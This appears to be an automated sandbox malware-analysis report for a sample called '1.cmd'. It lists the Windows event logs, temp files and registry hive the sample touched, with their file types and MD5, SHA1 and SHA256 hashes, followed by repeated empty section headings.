C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx	data	9B3B244C997316E5AAF45EE5357F8CB9	7D7096D753E558A7A78A1BF2C48595AA6FEA4411	65242DABB1E89A773F64009609067D8EE68DD749EF4DAB2CDFC69381A588429D
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx	data	9EAAD7982F42DFF47B8EF784DD2EE1CC	542608204AF6B709B06807E9466F7543C0F08818	5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx	data	4F68D6AF0C7DB9E98F8B592C9A07811C	9F519109344DD57150F16B540AAA417483EF44FE	44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx	data	DCAEFB4CFE6B5597E2695AE712E2F52C	DA2755B33D3C77DB2079940CC731FFE2A4786DB5	1456AC5A3205834F62C107952CC079610EEF4188C02C66AE2ED9807B09321EEF
C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx	data	977AF26CE27A3396A72725FBF098FB2F	D6BCC1A9773B4A28E04298A757BE89325A07817E	373BFFB927967A5A8C5B30F9CAD4707946971F64C431877D0101572E7DFD692A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx	data	B074238315662886E2BD70106D08A747	5ADA158D19401565E76349FCA97489E9FB9BFA36	53770508DCDA0199A75458B5A10DC8FD2E49A4CFD0FC001C16D56F3B567AB71C
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx	data	7C35AE7799444BA51305F08470819182	69F7281E876D4DDF12172D988F6A689E7B43CE79	24FC5B64AD7AACD89BD3111C8402AD478229733A1DC5238ABDA6002590904FC1
C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx	data	E6E4C860CE7DD1BB499D6A082B461B90	11330861B23B1D29D777D9BD10619A07B6A6A9C0	C27431D9C64F5C9D323E2B4ED5F44781969B34F30DC4280296A329DCD6509D44
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	data	188278CD4E5CCB184C0D5C5F8AE14E5A	06549039C676007C26084A2D86C9460F201A1DD6	0A93B55EEFDE1A64F92514B5F7FC43B8393E8009633C1E6F5D08FAE20FEB9035
C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx	data	B0BF4D9EC91ABBDA5D328631B125A5C0	E672D69127AE7C1A51046ADAA911871EC0C10ABB	8DBE6F5B80B3D973BBF1177BCCAA690B9F90FC99DC358B7DE66175317C733501
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx	data	E3FB1708C64D250E4D801AFB8688DF35	8B889F0358683733257411E451A86E3A1D42159D	0B62FDD9A57B1809D79561AE64BE30DD7430815D6954A5E3DF90E29E1B2E6C72
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx	data	39D50AC0A6FB19B10351B0B95864C553	C3226D2043EC640AB3DEB9126CA837BB64C6267A	67DD28B8A168FBFC6E3CF184443D299D40E7DA612828E0E1106F57F9BF8CB794
C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx	data	8F5FACAEC835E59EB086543AA14D1E5D	9C7A60C39666234A41FCAE59B937DC293D78D89E	E6452075DCD968D2B4CC467515B3D7BA3AAF671A5132D6D40B87D1E50E4C876A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx	data	2045FB0D54CA8F456B545859B9F9B0A8	35854F87588C367DE32A3931E01BC71535E3F400	E4305D5E1125E185F25AABA6FF9E32DE70B4EFD7264FE5A0C7C2EF3C33989C45
C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx	data	1AB19FA472669F4334C7A9D44E94E1B3	F71C16706CFA9930045C9A888FDB3EF46CACC5BC	549D89A256E3C71AFCBF551EC9BEDBDB3CF2DC74B4F8C214FDC1D270FB731F6E
C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx	data	7BCA54AC75C7185ADFBB42B1A84F86E3	AD91EE55A6F9F77AD871ACA9A5B59987CA679968	A43B1365211A968B4EC3F9EC7489D05AD9EED30D3EE0CCD89860D20DFE1914D4
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx	data	B6B6F199DA64422984403D7374F32528	980D66401DFCCF96ADDDAF22334A5CE735554E7F	8F65F81EE28F48B5007E04842ACC9DE20794A59E2759C2F35F7C10730A1EF7BF
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	data	4140628CA3CEC29C0B506CEEBDF684F6	A2B70496C8E91D8E78AA04976B25D850ABAC6E1C	1823149759A2F1771ACE7B6BE14A0FEFC6F93DD9F81AC1024E6B41C2CCBFD8B0
C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx	data	D7EECF043241FDB9486580582E208603	045D5672A8E9884B78CD31C52D372375503CBF4F	6F3BE76FC00FE21C18A904058F2AF850204488187187C9B8C4BF11EAA03EC6C0
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx	data	5096A411FC8DE7A2EFE92D23786E1D4C	DA92531A9728B9F56DCF5148A2C40C92A9FD4758	617D84832BBDD349A4E2D0FC818A40AAF4C6F637149839DEBCB32E522D9D6AEC
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx	data	FCEF23A3691F5D78A27C76D95B2F5ACA	E3F120D9DB395881D78867302DB16507D5C80E6C	F0E54B18E4C12AF5DBBA107ACAF7F6DA974A72AF12B7AD22BB1AD9D9A6BAB2C7
C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx	data	874B3F865EE985A801125E4649C849FE	20E2318217B84C7180FB988DFD93F3F5943D9808	CAF7DB29DB1E6C58EC894D5242E0692BE134FF4845F12A0DC03BA439B34486A6
C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx	data	FC81D9FBA555C6BC7223594B8F6B46DE	971F47CFC0E1DCA462928DA2D8BE2B16D5A0629C	9933922E09C49C5BA80292C4AED9EC9F457031E90B28B421DFFBD2F1BB840671
C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx	data	C9086547BF5F9E822F359679E7F67F40	2127B927EF9B279FC383FEE43C8B44E92864FF85	327257210F79945FB3AE7D54F04FC2BE85846177A9CEE0499AFC206F6DE5F944
C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx	data	6237EE0458A0478242B975E9BB7AA97D	6B0BDBA887DA21675A63FC73AED995B1BCA3F6B1	C8E224C54278C206302EAD7011ACC48CAC60E7638E32EE70653190DBC90FA70A
C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx	data	D13189B45679E53F5744A4D449F8B00F	ED410CAB42772E329F656B4793B46AC7159CF05B	BAA80D6A7DC42752766B1862A00009A1D76B57022A4D5A89692DBA2D6866EBA1
C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx	data	55E73A924B170FBFFF862E8E195E839A	3C625D05DFC08AE9DF26AEBAA82D72FC9F28ADB0	1B36D85AA56A023F6646D6EF28C9DCB5358528274EDCC9B6ED20705E3007E8A2
C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 9, DIRTY	6B97F9A35583E15C3DC8274B3F0A7C72	3EF206DEA358D780843CCAA28B9A40181546FB14	543F899BE6482935B952D0867AF10C6B064E23D934EF374AFD55DAA67B3A8155
C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx	data	6AA5FD4D824EFD4448C04B35C094FF56	B4EF0825ADCF4192C9F9E9E223077517D77E4BE5	E1440DDE27BCA23A2D29924AF202F43F54172C55AEF549E71F41DC08B532EDC8
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx	data	C37372EB51AEDB4552CB839C7294403A	7B7C408D72B084CE36AA6B623AC6B907FD21D569	C3B5D9D16F88507EF69A9B6FF8581AEBAFF84D254F62CD4E75B6A9C6F93E93C4
C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx	data	3365A34953FD7B16667108A049B64DA5	C72421A58E063D64072152344B266F8306A78702	AAEDFFE84B66B602858AF51D5B2EBA7CFC9DB57A4A3DD3240DB44B737B9BBF26
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx	data	4A38F556B28847C79565F8F5B2E18529	581498A0BC8A3EC2988AFE5C7FC0F60E14DF289A	E86ADB1001A17550D1F82D4B4136E5BD225EFC1D5456A36CE24E78834324A687
C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx	data	67CAD90771EBC0BD20736201D89C1586	EE241B07EBD6E7A64AE367520F5C0665F4EBBAD7	7801ED56F87C5A71A42128D089176CFDAACCCD6998EACCD07E46207F2CD48467
C:\Windows\System32\winevt\Logs\Security.evtx	data	EE8158B63D705FFF801B791B44016C44	14CBFBAB6E6AA4DE6C3F4E286DBC7934D96742C3	87DE0FBF45D47322673770905464FB86C7D1858AB65BA73A33A12202AAC66BCE
C:\Windows\System32\winevt\Logs\System.evtx	data	9BDC273BED40B8666562C1CF55CF35AB	C99C338E2B9DA3FEBE248763E66C4563B6155537	FC974E37E278EC66C1E07D4011E7CE0A54E7EFFADF9D6D565404F0161AD1913C
C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx	data	989FE11B6850F4E607A4BB44FE61EE3F	3BE41878FD7BAACDE6262191CEFAB3482CF1C1CA	F4C05CF2479E1CEA9D7317E6ACFB8B91F6A3866CBBEC691090E100A1B3943172
C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Windows\Temp\__PSScriptPolicyTest_lvxm11ep.434.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	6C2338766D8478DF3B9442DF7361058B	542BE768E8C7ADF462F6F6E80DA7E53FE7337AAE	730FA60EF15D586994FCE66B5D90A2B29E0F6117E8E2E78A9C56DA74FC212A6D
C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)	ASCII text, with CRLF line terminators	B133A676D139032A27DE3D9619E70091	1248AA89938A13640252A79113930EDE2F26F1FA	AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
\Device\ConDrv	ASCII text, with CRLF line terminators	D8C4F9FD5B972AE487170EA993933179	32E61F1DD8A462CEDC6B7A636275363B011ABDA9	728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
\Device\Null	ASCII text, with very long lines (2692), with CRLF line terminators	39401ABDD4A08EE5458DF7CB80F69CED	A4F498F6E926AC3A23F561C1C582C51217FA9093	06CC781B4C21259ED5B86C26A54BFCFD61D5049BF62338571F77E801227FFAC1

Windows Analysis Report
1.cmd

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report 1.cmd

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
1.cmd